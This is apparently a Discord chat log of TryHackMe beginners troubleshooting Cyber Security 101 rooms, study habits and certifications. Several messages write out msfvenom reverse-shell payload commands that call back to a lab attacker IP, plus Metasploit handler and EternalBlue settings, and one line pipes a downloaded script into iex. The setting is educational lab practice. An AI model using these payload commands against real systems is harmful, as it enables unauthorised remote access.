If it's still not clear, go and check the login page in the browser. The URL contains the same thing that's missing from the command. 😉 Good luck!

I have been doing the Metasploit modules, and it seems like I can never get a connection to the machine I am supposed to be hacking. Is this normal?

En el ejercicio 8 de John The Ripper viene esta pregunta:
What rule would we use to add all capital letters to the end of the word?
a lo cual estoy respondiendo ¨Az¨[A-Z]¨¨ pero me lo marca como error, alguien sabe porque?

Guys how much time do everyone spent on THM course everyday??

Hey, thanks! I've let it run but still I get a lot of attempts so I guess I still do something wrong. I've added what's after the IP in the path after http-post-form but still a lot of tries

Gave +1 Rep to @cosmic agate (current: #2324 - 2)

NVM it worked, thanks again !!

Hey dude I spend an hour or so a day on n thm courses 👍

@fierce galleon which time dude?

Im in the GMT time zone, I usually finish work around half 3 and try to get an hour or so done around 6 if everything lines up and I have a moment to sit down 😅👌

On an 8 day streak atm 👀

Hello guys did some of you guys found alternative for the linux fundamentals? i don't want to pay for the subscription just yet. thank you !

please check your inbox

Could you please help me? I’m currently studying Active Directory and practicing with a lab.
Right now, I’m working on the task of creating an automatic lock screen policy. I’ve already navigated to Computer Configuration > Policies > Windows Settings > Security Settings, but according to the attached screenshot, I can’t find Local Policies > Security Options > Interactive logon: Machine inactivity limit.
I’m not sure if I did something wrong or if I missed any step.

Can someone give me a hand, please? I already restarted my PC and logged out from the webpage, but I still have the same issue. I can’t connect to the remote machine using the SSH command: ssh root@10.48.156.30. I’m entering the correct password (Tryhackme123!), but I keep getting the response: Permission denied. Could anyone help me, please? and i cycbersecurity101 commands line; task 3; NETWORK Troubleshooting

double check the user you're trying to ssh as (it is not root)

Hi everybody,

I just passed SEC1, and the Cyber Security 101 path is clearly very far from enough to get decent results at the exam in Web Pentesting and Bruteforcing/Cracking.

So what other rooms or challenges do you think I should take in order to have the basic level required to pass that exam?

Hi i have a problem with the Active directory basics room. the machine won't start and freezes at please wait for the group policy client. is there a fix to this ?

nvm fixed it

Since I am still in the pre req part of the cyber security path way. What practice rooms would you recommend or should I just wait till I'm further along to fully understand

Hi All! I'm stuck on a problem & would love some help if possible. I'm in the Metasploit: Exploitation room, Exploitation section. I'm usingwindows/smb/ms17_010_eternalblue, have set the payload togeneric/shell_reverse_tcp, and the lhost to the target ip. When I run 'exploit', it says that target is not vulnerable & no session is created. According to instructions, I'm supposed to be able to interact with the session. Also, this is needed to answer a couple of questions. Any help would be appreciated.

make sure u start the right vm

I'm using the attackbox.

ye but the vm u are attacking

yes, I set it to the target ip address (copy/pasted)

Check if you have started the correct virtual machine for that part of the path; verify if the one you have started is the exploration virtual machine or the previous one.

Ahh, I'll try that. I think I might've been on the prvevious one. Thank you

np

the machine is always right

worked.. thanks again!

In Metasploit: Meterpreter room, Task 3 (Meterpreter Commands), how do I get the meterpreter command prompt?

Anyone else have issues with the Blue Room in Metasploit module?

I tried to run exploit but Metasploit said machine is not vulnerable?

update: tried switching from kali box to attackbox, worked up until i tried the command to run switch from shell to meterpreter and it started sending a bunch of shells to ip address so i rebooted the system again

The target is not vulnerable.

skipped the shelltometerpreter and was able to succesfully complete the room

There are Youtube Videos for each room, maybe they help you. I just started with the Metasploitintro room, maybe i run into the same as you

Hey, I am in the CAPA (Common Analysis Tool for Artifacts) room, and I am having difficulty getting the machine to load properly

Did anyone else have this issue when doing it?

Nvm, issue is resolved, just took a long time to load :3

Hello, I want to learn about cybersecurity but I don't know where to start.

~/Hashing-Basics/Task-6/hash1.txt

Hello interested

Hello guys

can somebody help me in solving this issue with my VPN "Looks like you're running Kali @MuirlandOracle

[+] Stable internet connection
[+] OpenVPN is installed
[+] tun0 exists
[+] tun0 IP is in the correct range
[+] Only one instance of OpenVPN is running
[+] Confirming connectivity
[-] MTU value failed at 1000, aborting MTU check
[-] Something went wrong -- please ask for further assistance in the TryHackMe Discord server, subreddit, or forum

hi can someone tell me how to advance in the attacking field of cybersecurity i am just learning random things like solving bandits levels in overthewire and learning scancode-toolkit learnig python for scripts what to do i just taken some projects and started building what more can i do can someone please guide me

The THM Cyber Security 101 pathway is a great place to start and help you build a good foundational knowledge.

Am I ready for the sec+ if Im getting 70-74% on the Dion practice exams?

Hi, so you passed the Cert meaning you got certified in SEC1, right?
But by going through the Cyber Security 101 path you couldn't get enough knowledge to pass the exam easily and/or with a good result in the parts of the exam:

• Web Pentesting
• Brute force/cracking

Do I get it right? I also intend to do the exam and want to know what it's like. Maybe the Junior pentesting path contains some rooms.

I would try to get a little higher on the exam. Don’t focus so much on a passing score, but more on knowing the foundational concepts. Train to the material, not the exam. In the end, the knowledge you seek as part of preparing for the exam with be more valuable than the cert you get by passing.

Thank you! I’ve been studying like crazy I’m taking one more practice today and then taking the real exam Saturday!

Gave +1 Rep to @wheat frigate (current: #3601 - 1)

I had similar scores prior to taking the exam and passed.

Hi, correct, I got certified in SEC1.

Yes, you get it right. Although I was technically able to pass the exam with Cyber Security 101 only, I didn't get good results in read teaming.

I guess it's still possible to get good results with nothing more than Cyber Security 101, but then I think you'd have to pay attention to every single tiny detail from each room without exception. In my case I got one word wrong in a single command which made me completely fail (10/100) a big section, and if I had more time I would probably have realized my mistake at some point by coming back to that specific tool and checking more closely my initial command (I did take notes from the dedicated room for that tool, so no missing knowledge here, just a lack of experience). Instead, I quickly switched to other tools which were a dead-end and wasted all my time.

So it's just I have the feeling that the Cyber Security 101 path gives you all the raw knowledge, but it's really a shame that there isn't a big room or final challenge at the end of the path that allows you to put all of that knowledge back together and practice various red teaming scenarios all at once. I think that's the only thing missing right now in that path.

Now I have all the basic tools and knowledge, but not enough experience to be able to decide right away approach is the best in a specific case (so, instead, I try many things, hoping one will work).

I haven’t taken SEC1 yet, but purchased it. I would say that much like any “boot camp” or 101 level course, you will learn the basic concepts but from there you have to go deeper on topics to gain more knowledge to be proficient in that concept.

Are there any updated rooms after AI boom? Like I'm in the room search skills. It seems mostly on using google, duckduckgo etc. but how about utilizing chatgpt in a hacking use case

chatgpt and other ai bots can mush up a lot of information together and give you a wrong output, searching by using google or any others is much more reliable than using chatgpt or any other ai bots, i'm not saying that they are bad, just not so reliable

I only use ai when i need to analyze big chunks of code or any other type of information

Thanks for this info. It's like fresh air after being waterboarded for hours in the CAPA room. So many rooms were great experience even if things sometimes got difficult, but CAPA is a different beast. I kinda got discouraged a bit and had to look for CAPA related information if anyone else suffered.

Gave +1 Rep to @royal timber (current: #1428 - 4)

So just got through the fundamentals. Admittedly this is all new. Is there labs I should be doing to brush up on the basics before heading into cyber 101?

Makes sense

Good idea to have a recap at the end of each path, but I see a recap at the end of each module. Although they are inactive it's still a good opportunity a practice or refresh the material.

question..since i am still early in my learning paths...until i am able to get linux on to a deidicated machine...is it still good to use the THM virtual machiines for easy challenge rooms once i am able to do those comfortably ?

So for the powershell lesson, the last few questions I had to look up to figure out how to solve the challenges. Is there material I can reference? I feel like the instruction didn't cover all the commands needed. Or am I overthinking it and just keep going through? Just got to Linux.

Yes I've seen this too, but it's brand new, right? (Or I'm becoming crazy.)
Now I take the recap when I reach the end of a module. It's nice that they've added that.

Hi, why don't you just use a Kali VM on your host OS?

i will at some point once i know how to do so..i mostly want to use the VM here on the site while i am still learly in my earning my path of cyber-security 101

It's very easy. All you have to do is go to https://www.kali.org/get-kali/#kali-virtual-machines, then download for example the VirtualBox version. Of course, you need to download and install VirtualBox too: https://www.virtualbox.org/wiki/Downloads. Then you add the Kali VM to VirtualBox, and that's it basically. Let me know if you need help with the configuration.
You'll also have to download the .ovpn file from THM (to your VM) and use "sudo openvpn [THEFILE]" before accessing THM's machines.

Give it enough resources if you want the tools within Kali to be fast enough (especially when cracking stuff).

Kali or any other Linux distro is worth your time. You will learn a lot + save plenty of time (THM AttackBox is slow).

Thanks guys. If I get stuck I'll reach out

Could someone please help me with this recap question:

Which command would properly search for a specific string in a PCAP file using tshark?

I'm going mad trying to solve this 😅

Looking for cybersecurity 101 notes. Has anyone made a summary or cheatsheet for the whole path or anyone has good notes?

Hello my name is Mark

https://tenor.com/view/tommy-wiseau-oh-hi-mark-hey-mark-gif-17296134

I’m having hard time retaining all the information I’m learning. I’m nervous that I’m going to get to PT1 and freeze up. Any suggestions.?

Hi

Having difficulty with that as well. Was considering making some memory cards (front the acronym, back theory) helps with memory 🤔

Hi

I used to summarize all the tasks so I can read with “my own words” but it’s took me hrs to finish rooms,
Now I’m just reading and doing the tasks/rooms then summarizing for me to remember what I did before PT1 I would probably gonna recap it

That’s literally what I’m doing now. Haha I have a whole spiral notebook full of just shit from every task. But as soon as I do a topic refresher it’s like my mind is in hamster wheel mode. @severe night

How are you using the notes? Is it digital and you write summary of what you did only? I have a challenge in taking notes i don’t know the correct way.

It’s all physical notes. I literally read everything first and then I write EVERYTHING that’s in each task. Highlighting things that are highlighted in the actual tasks. @clear badger

I’m using Notion AI to summerize most of the information that will help me in the CTFs I can give you a look how I did it it’s really like Tip notes not all the tasks to details

NotebookLM is another option. You can make notes, give it be pages, youtube videos etc and then ask it to summarise, provide flashcards, quizes and even podcasts on your notes.

I write all notes in my own words on Obsidian but if I want a recap or additional reinforcement of learning I will pass my Obsidian notes to NotebookLM.

Me and a Friend got the Problem that the Virtual Machine from Active Directory Basics is not Starting if you active it its gonna stuck on the Applying Computer Settings and then freze

can you please explain how do you use it?

If its allowed can someone please share his notes

I bought Notion AI subscription and let him summarize texts I wrote to my self

If it’s allowed I can share a few pages

would appreciate it if you can
but i am not sure if its allowed or not

Dm me

hey everyone ! just started the course and it's so interesting

“Hello everyone, my name is Vandini. I am currently taking the Cyber Security 101 course and wanted to connect with others to exchange ideas a bit. I am currently at 77% in the course.”

Anyone can offer me guidance on metasploit:explotation task 6?

Is there any CTFs specifically for cyber security 101 content so that I am able to test on what I learned ?

Yes there is a Certification if you complete the courese there you can Show your skills

Gugs

It’s is possible to crack pdf pass

You can brute force with pdf2john + john.
There's a example on this room: TryHackMe | Passwords - A Cracking Christmas
https://tryhackme.com/room/attacks-on-ecrypted-files-aoc2025-asdfghj123

Can u crack if I send a file

Nah, that would be against the purpose and TOS of this platform. This is a learning platform, and only educational content is allowed. To crack some random pdf without the creator's consent is not legal, inside or outside this platform.

Thx

Gave +1 Rep to @teal zephyr (current: #873 - 8)

Hey ! actually doing the Exploitation Basics > Metasploit:Exploitation and i find it a bit odd that for Task05 you need to use Meterpreter for the 1st time where the actual course on Meterpreter is the next room, couldn't solve this one with the the actual explanation, had to look for other people answer which i find frustrating especially if you have a dedicated room to learn about it just after. Overall i find the course really good and had not struggle for the rest of the rooms, this is just a feedback and thanks you everyone who worked on it 🙂 maybe i'm missing something , have a great one !

Hey I have a Problem in firewall fundamentals task 4

“For this task, you have to enter an IP from TryHackMe in the browser of the virtual machine, and a page should appear, but for me it says ‘Cannot reach the page’.”

Can someone help me ?

Hey guys , Im about to finish this path , and I start mess with a challenges and I’m getting lost when I need to understand what to check ,
What your work flow on CTFs ?

How important is it to remember all the most used network Ports? Ssh, http, https etc
Working in a different it field i would look up something similar with two clicks

Depends. If you're studying for some cert then you'll probably want to memorize them. Otherwise it's kind of a waste of brain power/space in my opinion. Naturally, with experience, you'll know them off hand anyway and you're right, they're only a quick search away.

Mainly for SEC1 currently
Creating pop quizez via copilot based on tryhackme's cyber security 101, there was a ton of questions on port numbers, and ofcourse, those i haven't memprized already

I see what you mean. I memorized them for sec+ in the past. If you have a solid list just sprinkle it in to your normal learning. You'll have em memorized before you know it 👍
I forget the site name but people make flash card sets. It's pretty nice to have that handy and just click through them whenever you remember.

Found one at crucialexams.com
Thanks for the tip!

Gave +1 Rep to @waxen hinge (current: #148 - 72)

Ehi

Hey guys, I was wondering that since pre security got revamped, should i go back to it and do the new rooms or stick to cybersecurity 101 then go back to the pre security path once im done?

hey you def should do the path, it has more interesting and relevant info

I went back to it , I recommend it

I’m back in cybersecurity 101 already

I'm currently at 50%

Yes, I think you should go back to it. I'm almost done with it, and then I get back to cybersec101.

Go to https://picoctf.org/. There are a lot of challenging CTFs. I recommend that

i just finished pre sec (new) i want to become a Penetration Tester so what is the next logical step i saw cyber sec 101 but many things there i learnd already in the pre sec (legency)?

Alright thank you

Gave +1 Rep to @crisp cairn (current: #1794 - 3)

Alright, do you take notes when doing the rooms or do you just read and do the questions with the VM (thank you)

some stuff like the new windows and Linux cli rooms they added to presecurity, I didn’t take notes because I knew them already

But stuff like the operating system, components of a computer , virtualization and cloud computing basics , data encoding , cia triad etc . I made sure to take notes

Oh i see, so basically take notes on the things you don't know and the things you do know you can just breeze through them. Thank you

Gave +1 Rep to @kind marsh (current: #3657 - 1)

Taking notes is a great way to reinforce learning points. It's also a good way to start learning write ups.

I see, if i already have been through some rooms, should i go back and take notes on them or start taking notes on the room im currently in and keep going

I guess that would depend on the rooms and how well you feel you have retained the information and/or the likelihood you will need to remember that information in the future.

Alright thank you 👍

Gave +1 Rep to @jade lily (current: #1794 - 3)

hey guys in the room "Networking Secure Protocols" im not sure but i think there is an issue with the very final flag am i allowed to post it in here?

Where are yyou looking?

when we use wireshark at the end

the flag in wireshark is slightly longer by one B than what is allowed i think

unless the brackets in HTTP/2 are written with a B but i thought it was with %7

can i dm to not spoil the flag if anyone hasnt done it?

Sure. Send me a DM

done

Thank you @jade lily

Gave +1 Rep to @jade lily (current: #1451 - 4)

I'm sorry Bob in R&D, they made me do it

@jade lily totally agree!! I started using Joplin Notes from the beginning of my studies and it’s the best thing I ever did. 8 months now and it’s a wealth of structured information that I use for reference and writing lab notes and practise pen test reports from my home lab work and try hack me rooms.

Looking for a little guidance.
Metasploit Task 5: Exploitation: I was able to find the flag. Now I am unable to get Meterpreter to run so I can't use hashdump. I have been unable re-run the the reverse_shell as well. I have tried restarting everything and made sure I am running the correct target machine etc.

If you use the exploit several time you were probably get blocked by the target machine , choose the right migrate app and try again

You can always terminate and re create the machine

Hello guys , I finished finally this path , any recommended CTFs to challenge the knowledge I get from this path ?

I feel like I'm missing something with the Metasploit Exploitation stuff. It's a "20min" room but has taken me days.
There's a lot of instructions saying use Meterpreter, however, that isn't covered until the next room.
Is it also normal for Metasploit to constantly crash or hang up?
I find I'm spending forever terminating and restarting terminals.
All rooms up to this point have been great and easy to follow and learn but this one seems 🤯

i can help you tmr if u want dm me

@severe night thank you for your help!

Gave +1 Rep to @severe night (current: #3658 - 1)

I'm stuck. I admit, I'm totally stuck on OWASP Top 10 2025: Application Design Flaws Task 5... I completed all previous tasks with ease, but I obviously cannot make the leap for this task - can anyone point me a direction?

I spent almost 3 hours on this 30min room, just because of this task, apparently my brain's gone offline 🤷‍♂️

Hi , can you please verify and upload some shots of what's going on 🙂 ?

How do I verify? I recall this to be a common request here. I probably cannot post any shots before, right? (added my Discord to the profile now, maybe that's doing the trick?)

Hey sorry, bot seems to be down, feel free to send picture in DM as a temporary solution 🙂

Yes, I also have the same problem with Metasploit. The machine is not even starting up i'm only seeing the ip adreess. Anyone, if you can i need your help.

There is a reason THM provide a short list during metasploit... running the rockyou.txt
I checked, it is in there. Its still going i've made a coffee, still going. 😄

That says it all:
Machine expiring soon

Your machine is going to expire soon. Close this and add an hour to stop it from terminating!

Hey i just finished the Pre-Security path and starting SEC-1 preparation now.
Anyone want to team up and study together?
DM me 🙂

its the same design flaw case with the given example

https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

Anyone currently working on SEC101 is welcome to join my TryHackMe team so we can collaborate and solve the tasks together:

https://tryhackme.com/manage-account/teams?joinTeam=9d9f2ff593

Are you connecting with OpenVPN and SSH? I have also experienced that my terminal connection lags when using ssh to connect to boxes in various rooms.

All sorted now. Thanks

Gave +1 Rep to @unreal raptor (current: #3672 - 1)

Hi Ali , can i enroll in cyber security 101 with out subscription

I don't believe so. You may have access to a few of the rooms but not the whole pathway.

so what to do

Have you completed Pre Security?

check my account by username dilawar1339. it need a subscription. i didnot have, so i do else Labs.

If you want to complete the pathway then you would require a subscription

Can you help me with that

Click your profile picture -> Manage account -> Left side (Subscription) -> Should find what you're looking for there.

i have no ability to pay, Is there any optionto share the subscription.

You can do free labs

Mr KGB can you share your experience

Regarding 🙂 ?

About the Cyber Security, So I can take the Guidence

I passed my sec+. Any advice on what to do next?

Congrats 🎉

I want to ask CyberSecurity 101 path has 2 common rooms named Linux Fundamentals & Windows Fundamentals as compared to Pre-Security path

So whys that?

The Pre-Security Course has been redesigned and no longer contains the Linux & Windows Fundamentals Sections.

Any1 got the hundred sessions issue when running eternal blue? room/blue ?

208 sessions....

Can you provide a shot of your options 🙂 ?

Killed all sessions and tried again 🙁

But I did the most basic steps, nothing extra

I believe I only did setg rhosts <ip> and run

Can you please type options and provide a shot 🙂

guys i want to answer this quetions
room JavaScript Essentials

In the file invoice.html, how many times does the code show the alert Hacked?```
the answer is 3 but why is wrong answer?

<!DOCTYPE html>
<html lang="en">
<head>
    <title>Hacked</title>
</head>
<body>
    <script>
        for (let i = 0; i < 3; i++) {
            alert("Hacked");
        }
    </script>
</body>
</html>

this is the script. the correct answer is 3 but it's wrong, so when trying the correct answer is 5, maybe something miss validation @woeful jungle

You must open the js file on machine, not the script provided in task section

Its confusing off course

owhh i see, im sorry, my bad

thanks for the info

Hey, i need a bit of help with the room Moniker link. Task 3 exploitation,
when i use Responder -I ens5 , i keep getting a ssl port error which i cannot connect to any ports, the code works fine, email sends, but nothing is receiving on my side

hey, I could use some help in Metasploit Exploitation Basics I'm stuck on trying to find the flag.txt file

What is the issue 🙂 ?

This basic Burp Suite task 10 load time is giving me headache unless I misconfigured something which I don't think I did? Has been loading for like a long time now. Does anyone else have the same issue?

Are your intercept on?

Yes, even the web showed up in the proxy tab

But the actual page wouldnt load

Oh I get it, so I have to turn my intercept off

I had multiple issues with that room, but the problem is that my pc is very old so the connection gets very unstable.

ah and in future tasks when I have my intercept on I can press forward to actually do that I get it

Yes

Intercept is useful when you want to edit the HTTP request before sending it

did u find a fix to the problem?

Hey in gobuster: the basics. I am having an error to connect to the offensivetools.thm

I already changed /etc/resolv-dnsmasq file (and restared it)

Try to edit /etc/hosts file

done ty

ended up sorting it out, had to find the meterpreter payload

Anyone able to help me with the topic transition recap, the AWS enumration question, I'cve ytried several times and it's not working

hey im new on discord i am about 80 percent done on the cysec course i just finished the capa room

anyone know how to get the blue room .ova offline files? tried getting it from the resource page but the google drive links give a 404.

Can you share which link you are trying to view?

guys I have a problem with the Metasploit: Exploitation -> MsfVenom maybe you can help me. I made the payload using msfvenom , i download it on the target machine set it as executable but when I run it I get a Segmentation fault ( core dumped) message

this is the payload : msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.113.126.xxx LPORT=7777 -f elf > rev_shell.elf

and this is the message when trying to run on the target machine
./rev_shell.elf
Segmentation fault (core dumped)

I tried to make the payload also as x64 : msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.113.126.xxx LPORT=7777 -f elf > rev2_shell.elf , same error

Did you setup your multi/handler to receive the reverse shell connection?

Yes

Tried different ports

Did you set up the payload correctly in the multi/handler?

What values did you supply?

The port in handler and in your msfvenom must be in the same port

Yes both sending/ listening on port 7777 I tried also both on port 5555 i tried restarting the target machine 2 times same error

This is the exact command to make the payload

This

I hope so, see above the command for the payload

Can you share a screenshot of the command you used for your reverse shell payload and the multi/handler options you supplied?

@late quarry u know too much 😂😭😂

I’ll try to redo it tomorrow and let you know, thanks for your help and patience

Gave +1 Rep to @late quarry (current: #11 - 923)

this is the commands in msfconsole :

use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 10.113.103.174
set LPORT 7777
exploit

What I think now is that i need to remake tha commands fro msfvenom and msfconsole to use x64 instead of x86

i tried : msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.113.103.174 LPORT=7777 -f elf > rev_shell_x64.elf and set payload linux/x64/meterpreter/reverse_tcp

same issue

./rev_shell_x64.elf
Segmentation fault (core dumped)

trying now to make the payload stageless see if this helps

The payload in msfvenom and the multi/handler should be exactly the same.

What is the architecture of your target?

x64 both

what should i put as payloader in this case?

Is 10.113.103.174 your tun0?

Or attacker IP?

attacker ip

What is the output of uname -a?

Linux ip-10-113-89-181 5.15.0-124-generic #134~20.04.1-Ubuntu SMP Tue Oct 1 15:27:33 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

Also, can you try this instead -

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.113.103.174 LPORT=7777 -f elf -o rev_shell_x64.elf

ok

i'll try now

i'll just change the ip to the new ip

same thing

[] Started reverse TCP handler on 10.113.89.181:8888
[] 10.113.151.128 - Command shell session 1 closed.
[*] 10.113.151.128 - Command shell session 2 closed.

this is on attacker

and this is on target

root@ip-10-113-151-128:/# chmod +x rev_shell_x642.elf
root@ip-10-113-151-128:/# ./rev_shell_x642.elf
Segmentation fault (core dumped)
root@ip-10-113-151-128:/# ./rev_shell_x642.elf
Segmentation fault (core dumped)

i've changed your text to msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.113.89.181 LPORT=8888 -f elf -o rev_shell_x642.elf , changed the ip and port

and on msfconsole I've set ip and port accordingly

and used msf6 exploit(multi/handler) > set PAYLOAD linux/x64/shell_reverse_tcp

MADE IT WORK!

sorry for the caps :), just happy

I made 2 changes, i used stageless instead of Staged payload and changed to the default port 4444 : msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.113.89.181 LPORT=4444 -f elf > clean_shell.elf

meterpreter connection is now working

Hello! Starting out as a beginner in cyber in my mid-twenties.
Wanna rely less on AI and more on the amazing people out here for guidance and accountability. Learning alone is boring, and I tend to forget things often and lose consistency.
Currently going through the CyberSec 101 Exploitation Basics module. Nice to meet y'all and looking forward to learning with you.

Nevermind. Thanks!

I just finished the tryhackme metaspolit:exploitation module and couldnt do it without a video which was the first time I had to do that. The next one is metasploit: meterpreter. How would a more seasoned hacker face this in the perspective of someone who only has a tad comp sci background but no cyber background? I was left in shambles. It said 20 minutes, I tried doing it myself and spent 2 hours and just decided that I needed outside help.

Don't focus on that estimated time as it is just a baseline, and you are still learning. Each one learns on his/her own pace depending on their learning style, background, etc. You do you.

Hi. I very recently completed the Metasploit rooms, and I can honestly feel your frustration. I feel like tryhackme tried to teach as much of the basics of the tool in very short rooms. To solve, I needed some guidance from AI tools. But I believe thm rooms are not enough to learn Metasploit. There is a series by Hackersploit I am planning to watch, maybe you can use it as well.

THM tries to teach concepts in bite-sized chunks so it is tricky to put really detailed concepts to it and oftentimes would refer to some other resources for further reading

As part of the learning process, I'd say it is a start which you, as the learner, should build upon.

Hi. I have a problem with entering the room Shells Overview (https://tryhackme.com/room/shellsoverview). When I click on it, there are no tasks. Have any of you guys had this problem?

Which machine are you using to access it? I saw a user comment that their anti-virus / malware was suppressing content

i just did this one , use FILE <filename>

they are on the wrong machine

that too

wrong folder

etc

this is the attackbox

the attackbox wont have your flag

god im soo dumb

lol

How to download evil twin

hey. just a regular windows device, microsoft edge browser. i haven't done anything but it magically fixed now hahah. i wonder what the problem was. anyway, thanks for help:)

Gave +1 Rep to @late quarry (current: #11 - 936)

ok, i'm taking it back. i managed to enter the room and see the tasks. but when i clicked "join room", i got a notification that i need to log in to join the room (although i was already logged in). Then when I went to the dashboard there was the login page, so I logged in, and when I logged in, I couldn't see the Shells Overview tasks again

now i tried a different device (which is my phone) and it works. i think i'm just gonna borrow a friend's device for this one room. thanks for help:)

I had similar problem, it was because of my browser extentions. Maybe it will work for you too.

Oh, ok, I'll check that. Thank you:)

Hi i am in Network Troubleshooting, itss on Windowscommandline. my question is: I try to ping example .com its request timeout. i try google.com also same. anyone can help?

think its because of the VM

you can make sure by using cmd and ping google.com

on your own device

ssh user@10.48.131.48 as user this one always request timeout

root@ip-10-48-71-58:~# ping example.com
this one work

are you sure that's the right ip ?

target ip

10.49.146.80

do you mind sending a ss ?

ss.. why dont have upload picture here...

oh damn , i just noticed

i can help you in DMs , i've recently completed that module

need another help, on module 4 windowspowershell.. Launching PowerShell.. is it on my own machine? those attackBox doesnt have windows split screen, only stuck on Remmina, can not open powershell

iex "& { $(irm https://aka.ms/install-powershell.ps1) } -UseMSI"
i use this on my machine.. its work now.. it just need latest update from version 5 to 7

hi , im having some issues on the recap for pwoershell commadns cmdlet

i've entered the same commands in the shell but it says wrong everytime

What command would execute the Get-ComputerInfo cmdlet on a remote computer named 'BLACKPEARL' using the credentials 'SHIP\captain'?
invoke-command -Computername BlackPEARL -Credential SHIP\captain -scriptblock { get-computerinfo}

i reavled the answer too as well and its the same thing there

i have problem, room linuxshells, ls only flag_hunt.sh, dont have like Documents, Desktop, Downloads and others..

Change user directory

its say that under maintenance on the end of program. but i still can follow along!

what happen in Wireshark: The Basics.. start machine is grey!

i try to open last machine on network.. back to wireshark and its open! is it bug?

Those of you who are on this path, are you already able to complete some of the challenges? There are some easy ones where I can apply a lot of the fundamentals, but sometimes I get stuck and can't solve them... sometimes I think I'm just dumb... I believe that even the easy ones have tools that the 101 hasn't fully covered yet, but I'm only halfway through the course.

The most important rooms I believe are Nmap, hydra, gobuster, cyberchef, burp

After learning them, you can try to solve some basic pentesting rooms like vulnversity, pickle rick, easy peasy, etc. They are great for practice with tools. But all of these challenges usually require some sort of privilege escalation which you can get the gist if you read or watch some walkthroughs.

hi , i was wondering if there are any extra challenge rooms or exercies i can do while doing this path

like if i complete the cryptography module and want to test , where should i looking to do some exercises

I don't know out of my mind, but you can always use search engines or LLMs (chatgpt, gemini) to search for challenges. I would say the latter gives better results

im sorry, wdym by latter ?

The LLMs (gpt, gemini, claude). Ai basically

sorry i meant, what is latter ?

.

alr got it , tysm

Is it just me or metasploit module is hard as fuck ?

Just You or either U skipped some fundametals

Slm

It might be unintuitive at first, but it is really easy to use once you get the grasp

You can view it as a tool to automate all kinds of exploits

If you feel stuck, watch a walk through on youtube or ask questions here.

In System Configuration, what is the full command for Internet Protocol Configuration?

Nah I didn’t skip anything , but it took me a lotta time prior to having no experience

Yes , now that I understand how it works
It seems to be easier

Couldn’t just get the thing where they started meterpreter outta nowhere in the exploitation one

Using the vulnerabilities, Metasploit sends a certain configured payload to the machine. It either leads to meterpreter or a shell depending on the type of the payload

Yes yes , I also did that module as well
But with what I’ve seen sometimes even with the right payload and exploit , it wouldn’t connected to the target machine
So I had to restart the machine

hey i am currently in the room linux fundamentals part 3 in the third task and it asks me to edit 'task3' located in tryhackme's home but i can't find it

it is at /home/tryhackme

ok i managed to find it but before when i was doing cd home there was only ubuntu and root and now there is tryhackme idk why

and now in /home/tryhackme there isn't task3 bruh😭

brooo

did you ssh to target machine?

Hum, i maybe forgot 😂

https://tenor.com/view/hiromi-higuruma-jjk-jujutsu-kaisen-son-higuruma-gif-9036947203690306241

Lmaooo ty bro

np man ))

Qardas

dafuq

how do you know that

I am turkish

ooo kardes))

Ahahah yeahhhh

bi sorun falan olursa dmden yaza bilirsin istersen

Tmm tesekkurler

kendine iyi bak)

hi everyone i'm David and iam looking for place where i can be mentored through my learning phase on cyber security, all i have is just a penetration lab set up and zero knowledge about what to do with it, pls i need help thank you guys in anticipation.

Why did he not let me log in the password is right a!!
i

qa

Hello am new here and want to gather as many information I can

Could u reply this on #cyber-and-careers if noone send a message for u

Thank you so much sir, i dropped a msg there

Gave +1 Rep to @gentle peak (current: #3749 - 1)

finish this Cyber Security 101 first, and follow along other path after, goodluck!

same to you bruh ?

Hey I completed the TryHackMe Cyber 101 path 3 days ago but still don’t understand 50% of it. Is that normal? What should I do next, should i just review them or go to the SOC level 1 path I want to be a SOC analyst. I will be willing to have a study partner

it depends no how information sits for you for some people learning a bit than find a CTF or a room to directly practice that particular phase on

soc sim can be helpful for a lot of it

Hello I suggest you try and write blogs and stuff to retain more information

Im planning to take the certification soon so I can be your study partner

https://youtu.be/-C3a3C97zVQ?si=yKXVu4GZmSLEm5TP

Also this series might help a lot

hey, im not sure if this is the right place for this but the "Shells Overview" room in module 9 just won't load. it just comes up with a blank screen where the tasks should be

Hey guys, I made a repository on GitHub for beginners explaining RSA encryption with Python, I hope it helps you!
https://github.com/sadcyberplayer/rsa-encryption-guide-for-beginners

what is the answer of this question?

What Tactic does the Hide Artifacts technique belong to in the ATT&CK Matrix?

can't find the hints.

@rain axle why can't it update?

im trying to get an internship in cybersec , i have linux fundamentals down : i complete the linux command line book along with practicals on my virtual box and then overthewire bandit , i wanna move on to networking and professor messer seems good but what about practicals and hands on labs ? how and where do i do it from

Just search in the page with ctrl f

Hello guys, in the task 4 of the Linux Fundamentals Part 3 room, the question requires me to download a .flag.txt file from the target machine. However, I can't find the required file in the home directory of the target. Is this a missing?

hey dude, mad this as I have liturally just done the same part myself. Are you still struggling to find the flag?

The thing that wasnt working for me was that I wasnt within a new terminal (which it does say to do lol) but then within the new term, use the "wget" command followed by the full URL. Once downloaded use the ls -a command that will show the hiddle flag file. Then just CAT to see the answer. Hope that helps dude! 😊

Hello everyone! My name is Keysie. I am reaching out to ask if there is a group of beginners here on Discord who are studying cybersecurity online. I would love to brainstorm ideas and help each other learn together! 😁

Hey could anyone help me, I got stuck on Linux fundamental part 3, task 6, which is the question is

"When will the crontab on the deployed instance run?"

While the crontab 05**1,
when I search it on crontabguru it says monday, but I can't even type Monday, I try 05.00am but it still can't work, did I missing something?

"Thanks dude! Just tried again and it worked. No idea why I couldn't download it yesterday, even though I opened a new terminal and used wget with the full URL, but we're good now!"

You are literally here. This is mostly a group of beginners here on Discord who are studying cybersecurity online.